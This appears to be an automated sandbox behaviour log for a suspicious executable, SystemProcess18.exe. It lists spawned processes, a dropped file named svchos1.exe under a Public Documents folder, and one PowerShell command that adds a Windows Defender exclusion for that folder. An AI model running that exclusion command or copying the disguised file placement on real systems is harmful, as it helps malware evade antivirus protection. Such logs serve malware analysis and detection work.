Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\Public\Documents\MM\svchos1.exe

28_2_035DF0E0

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_035E0BF0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

28_2_035E0BF0

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_034C3B44 cpuid

28_2_034C3B44

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,		28_2_006B2A97
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,		29_2_006B2A97

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
